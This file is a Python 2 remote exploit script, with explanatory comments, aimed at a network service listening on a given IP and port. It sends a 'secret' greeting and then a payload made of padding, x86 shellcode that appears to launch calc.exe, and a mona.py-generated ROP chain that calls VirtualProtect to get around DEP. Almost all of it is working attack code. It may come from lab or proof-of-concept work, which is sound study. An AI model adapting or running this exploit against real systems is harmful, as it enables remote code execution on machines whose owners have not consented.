- #!/usr/bin/python
- import socket, sys, struct
- # bp 40190c recv
- # bp 401912 after recv
def create_rop_chain():
    """Return the hard-coded 32-bit ROP chain appended after the shellcode.

    The gadget addresses below are emitted verbatim by mona.py (the
    per-entry comments are its annotations) and are packed back-to-back as
    little-endian unsigned 32-bit values (``'<I'``).  Nothing is resolved at
    run time: every address is a fixed absolute pointer into the named
    modules (RPCRT4, KERNELBASE, ntdll, SspiCli, KERNEL32, sechost,
    bcryptPrimitives), so the chain only matches the exact module builds and
    load addresses it was generated against — presumably a target where
    those modules load at fixed addresses; verify against the original
    environment before assuming it is reusable anywhere else.

    The last entry (0x760b9ef3) repeats the ``& jmp esp`` address above it.

    Note: ``''.join`` over ``struct.pack`` results only works on Python 2,
    where ``struct.pack`` returns ``str``; the file uses Python 2 syntax
    throughout (``print data``).
    """
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x777d83e4,  # POP EAX # RETN [RPCRT4.dll]
        0x779f3030,  # ptr to &VirtualProtect() [IAT bcryptPrimitives.dll]
        0x7776f046,  # MOV EAX,DWORD PTR DS:[EAX] # RETN [RPCRT4.dll]
        0x76073a50,  # XCHG EAX,ESI # RETN [KERNELBASE.dll]
        0x77b646a5,  # POP EBP # RETN [ntdll.dll]
        0x760b9ef3,  # & jmp esp [KERNELBASE.dll]
        0x77bde810,  # POP EBX # RETN [ntdll.dll]
        0x000004B0,  # 0x000004B0-> ebx
        0x77b628ac,  # POP EDX # RETN [ntdll.dll]
        0x00000040,  # 0x00000040-> edx
        0x77bcd8ad,  # POP ECX # RETN [ntdll.dll]
        0x76120532,  # &Writable location [KERNELBASE.dll]
        0x743bb3b2,  # POP EDI # RETN [SspiCli.dll]
        0x77132d41,  # RETN (ROP NOP) [KERNEL32.DLL]
        0x7606d63c,  # POP EAX # RETN [KERNELBASE.dll]
        0x90909090,  # nop
        0x761ff729,  # PUSHAD # RETN [sechost.dll]
        0x760b9ef3,  # same value as the "& jmp esp" entry above
    ]
    # Each int becomes 4 little-endian bytes; Python 2 str concatenation.
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
- # edi rop nop
- # esi virtualprotect
- # ebp jmp esp
- # esp lpAddress
- # ebx dwSize
- # edx flNewProtect
- # ecx lpflOldProtect
- # eax 90909090
# Raw x86 payload as a byte string.  The ASCII sequences "calc" and ".exe"
# (\x63\x61\x6C\x63 and \x2E\x65\x78\x65) are visible inside it, consistent
# with a proof-of-concept that launches calc.exe; nothing else about its
# internals is documented on this page.
shellcode="\xE8\x00\x00\x00\x00\x5A\x8D\x52\xFB\x89\xE5\x81\xEC\x00\x10\x00\x00\x52\xBB\x8E\xFE\x1F\x4B\xE8\x28\x00\x00\x00\x5A\x55\x52\x89\xC5\x8D\xB2\xE1\x00\x00\x00\x8D\xBA\xE9\x00\x00\x00\xE8\x48\x00\x00\x00\x5A\x5D\x31\xC9\x51\x68\x2E\x65\x78\x65\x68\x63\x61\x6C\x63\x54\xFF\xD0\xFC\x31\xFF\x64\x8B\x3D\x30\x00\x00\x00\x8B\x7F\x0C\x8B\x7F\x14\x8B\x77\x28\x31\xD2\x66\xAD\x84\xC0\x74\x11\x3C\x41\x72\x06\x3C\x5A\x77\x02\x0C\x20\xC1\xC2\x07\x30\xC2\xEB\xE9\x39\xDA\x8B\x47\x10\x8B\x3F\x75\xDB\xC3\x89\xEA\x03\x52\x3C\x8B\x52\x78\x01\xEA\x8B\x5A\x20\x01\xEB\x31\xC9\x57\x56\x8B\x36\x31\xC9\x8B\x3B\x01\xEF\x52\x31\xD2\xC1\xC2\x07\x32\x17\x47\x80\x3F\x00\x75\xF5\x92\x5A\x39\xF0\x74\x0C\x83\xC3\x04\x41\x39\x4A\x18\x75\xDF\x5E\x5F\xC3\x5E\x5F\xAD\x56\x53\x89\xEB\x89\xDE\x03\x5A\x24\x8D\x04\x4B\x0F\xB7\x00\x8D\x04\x86\x03\x42\x1C\x8B\x00\x01\xF0\xAB\x5B\x5E\x83\xC3\x04\x41\x81\x3E\xFF\xFF\x00\x00\x75\xAB\xC3\xAD\x6D\xBF\xE8\xFF\xFF\x00\x00\x01\x00\x00\x00";

# Usage: <script> IP PORT  (Python 2 only: print statements below)
if len(sys.argv) != 3:
    print "supply IP PORT"
    sys.exit(-1)

# Plain TCP connection to the target given on the command line.
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect( (sys.argv[1], int(sys.argv[2])) )

### send
# First message is the fixed string "secret\n\x00" — presumably a
# greeting/auth token the service expects before the large second message.
# From a detection standpoint this short text probe followed by a fixed-size
# binary blob is the observable shape of the traffic.
message = "secret\n\x00"
sock.sendall(message)

### receive
# Whatever the service answers is only printed; it is not parsed or checked.
data = sock.recv(10000)
print data

### send
rop_chain = create_rop_chain()
#breakpoint="\xcc"
# NOTE(review): ret_addr_s and pad are built but never used — the only
# reference to them is the commented-out print below.  'L' here is native
# size/endianness, unlike the '<I' used in create_rop_chain().
ret_addr_s=struct.pack('L', 0x746b5b5b)
pad="B"*400
# The shellcode is front-padded with 'A' so that padding + shellcode is always
# exactly 1040 bytes; the ROP chain therefore sits at a fixed offset.
# (The name says "nops", but the filler is 'A', not 0x90.)
nops_len = 1040 - len(shellcode)
exploit = "A" * nops_len
exploit += shellcode
exploit += rop_chain
#print("NOPS=%d, shellcode=%d, rop=%d, ret_addr=%s\n" % (nops_len, len(shellcode), len(pad), ret_addr_s ) )
# Total length is 1040 + len(rop_chain), i.e. constant for this script.
print("Sending %d bytes" %(len(exploit)))
sock.sendall(exploit)

### receive
# Second response (if any) is printed and the socket is left open on exit.
data = sock.recv(10000)
print data